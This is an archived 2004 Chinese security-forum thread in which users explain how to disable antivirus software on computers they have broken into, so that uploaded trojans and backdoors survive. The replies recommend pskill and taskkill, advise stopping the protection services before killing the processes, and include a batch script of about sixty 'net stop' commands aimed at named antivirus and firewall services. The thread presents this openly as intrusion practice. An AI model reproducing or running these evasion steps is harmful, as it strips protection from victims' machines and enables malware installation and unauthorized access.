论坛: 菜鸟乐园 标题: 如何解决掉杀毒软件?? 复制本贴地址    
作者: susttt [susttt]    论坛用户   登录
如果以管理员身份登陆一台机子
请问有没有什么工具可以杀掉常用杀毒软件的进程(不要在任务管理器里结束)
谢谢!

地主 发表时间: 04-08-25 09:13

回复: bluecat_ [bluecat_]   论坛用户   登录
我没有弄过哦

B1层 发表时间: 04-08-25 09:23

回复: linux [wish259]   论坛用户   登录
pskill.exe

B2层 发表时间: 04-08-25 09:40

回复: BSJ [b_s_j]   论坛用户   登录
WIN自带了查杀进程的命令 就是TASKLIST查 TASKKILL杀


B3层 发表时间: 04-08-25 11:04

回复: lijingxi [lijingxi]   见习版主   登录
恩  楼上说的正是!

B4层 发表时间: 04-08-25 11:10

回复: susttt [susttt]   论坛用户   登录
pskill倒是可以轻松解决norton的
但瑞星怎么也杀不掉,杀掉还在,其它的杀毒软件还没试过
忘推荐一款强有力的工具

B5层 发表时间: 04-08-25 12:42

回复: bluecat_ [bluecat_]   论坛用户   登录
那还有什么?

B6层 发表时间: 04-08-25 14:16

回复: K9999 [yandsd]   论坛用户   登录
2楼的  收到了~~~~感谢

B7层 发表时间: 04-08-25 14:27

回复: susttt [susttt]   论坛用户   登录
这几天一直被这个问题困扰,每次上传个木马或后门都被杀毒软件干掉
连ca.exe都被瑞星定为病毒
norton倒是没有把ca.exe定为病毒

B8层 发表时间: 04-08-25 15:09

回复: TSnew [tsnew]   论坛用户   登录
有一些杀毒软件服务保护!杀不死!!先停掉那个服务在杀进程!!

B9层 发表时间: 04-08-26 07:55

回复: susttt [susttt]   论坛用户   登录
楼上高见
我怎么没想到


B10层 发表时间: 04-08-26 08:04

回复: hackerjune [hackerjune]   论坛用户   登录
停服务杀进程??
没试过`````

B11层 发表时间: 04-08-26 08:27

回复: bluecat_ [bluecat_]   论坛用户   登录
例如在我的服务里面的卡芭斯基的时事监控服务看下图:

知道了吗


B12层 发表时间: 04-08-26 08:36

回复: lgf [lgf]   论坛用户   登录
呵呵!


B13层 发表时间: 04-08-26 11:29

回复: bluecat_ [bluecat_]   论坛用户   登录
楼上灌水...........me too

B14层 发表时间: 04-08-26 14:04

回复: TSnew [tsnew]   论坛用户   登录
正确!!大家可以写个批处理文件!专门STOP对方的杀毒,网络防火墙!小弟这个还不完善,希望大家把知道的一些服务加进去!
net stop "Symantec Proxy Service"
net stop "Trend Micro Proxy Service"
net stop "Trend NT Realtime Service"
net stop "McAfee.com McShield"
net stop "McAfee.com VirusScan Online Realtime Engine"
net stop "McAfee Agent"
net stop "McShield"
net stop "SyGateService"
net stop "Sygate Personal Firewall Pro"
net stop "Sophos Anti-Virus"
net stop "Sophos Anti-Virus Network"
net stop "DefWatch"
net stop "Ahnlab Task Scheduler"
net stop "eTrust Antivirus Job Server"
net stop "eTrust Antivirus Realtime Server"
net stop "eTrust Antivirus RPC Server"
net stop "V3MonNT"
net stop "V3MonSvc"
net stop "Quick Heal Online Protection"
net stop "Symantec Core LC"
net stop "Symantec Proxy Service"
net stop "Symantec Event Manager"
net stop "Symantec Settings Manager"
net stop "Norton Internet Security Accounts Manager"
net stop "Norton AntiVirus Server"
net stop "Norton AntiVirus Auto Protect Service"
net stop "Norton AntiVirus Client"
net stop "Norton AntiVirus Corporate Edition"
net stop "ViRobot Professional Monitoring"
net stop "ViRobot Expert Monitoring"
net stop "ViRobot Lite Monitoring"
net stop "PC-cillin Personal Firewall"
net stop "Trend Micro Proxy Service"
net stop "Trend NT Realtime Service"
net stop "McAfee.com McShield"
net stop "McAfee.com VirusScan Online Realtime Engine"
net stop "McAfee Agent"
net stop "McShield"
net stop "eScan Server-Updater"
net stop "SAVScan"
net stop "SyGateService"
net stop "Sygate Personal Firewall Pro"
net stop "Sophos Anti-Virus"
net stop "Sophos Anti-Virus Network"
net stop "DefWatch"
net stop "Ahnlab Task Scheduler"
net stop "Alerter"
net stop "AVK Monitor"
net stop "AVK Service"
net stop "Kingsoft AntiVirus Service"
net stop "F-Secure Anti-Virus 2004"
net stop "F-Secure Anti-Virus Firewall Daemon"
net stop "F-Secure Anti-Virus Gatekeeper Handler Starter"
net stop "eTrust Antivirus Job Server"
net stop "eTrust Antivirus Realtime Server"
net stop "eTrust Antivirus RPC Server"
net stop "V3MonNT"
net stop "V3MonSvc"
net stop "Quick Heal Online Protection"
net stop "RsCCenter"
net stop "RsRavMon"
net stop "KAVSvc"


B15层 发表时间: 04-08-26 14:23

回复: bluecat_ [bluecat_]   论坛用户   登录
不用写批处文件这么麻烦把

B16层 发表时间: 04-08-26 14:24

回复: susttt [susttt]   论坛用户   登录
谢谢 TSnew的批处理
TSnew用的多是英文版的杀毒软件或防火墙之类
中文版的话服务名就是中文的了
具体的看主机的了
如果入侵主机,木马传不上去,就用"net start"看看有没有杀毒软件服务,把它"net stop "服务名""停掉
这次提问对我帮助很大,谢谢大家


B17层 发表时间: 04-08-26 14:38

回复: TSnew [tsnew]   论坛用户   登录
可以不啊!!我是那来给大家产考的!在实际中没有这么麻烦啊!在对方CMD下――net start这样就可以看见自动启动的服务,然后net stop 服务名 ,就可以停掉那个服务了!在用kill(是2000 Support Tools里面的杀进程的工具)杀进程!不是所有的防火墙,杀毒软件都有服务的!但是有些是双进程,杀的时候就要写个批处理了!或者用专门的程序来杀!!

B18层 发表时间: 04-08-26 14:39

回复: bluecat_ [bluecat_]   论坛用户   登录


B19层 发表时间: 04-08-26 15:20

回复: apolo [apolo]   论坛用户   登录
把它服务停了还用杀进程吗?不用了吧?

B20层 发表时间: 04-08-26 16:07

回复: bluecat_ [bluecat_]   论坛用户   登录
停了服务不就是杀进程 拉.......哎...........
就是为了要杀进程才停服务

B21层 发表时间: 04-08-26 17:36

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号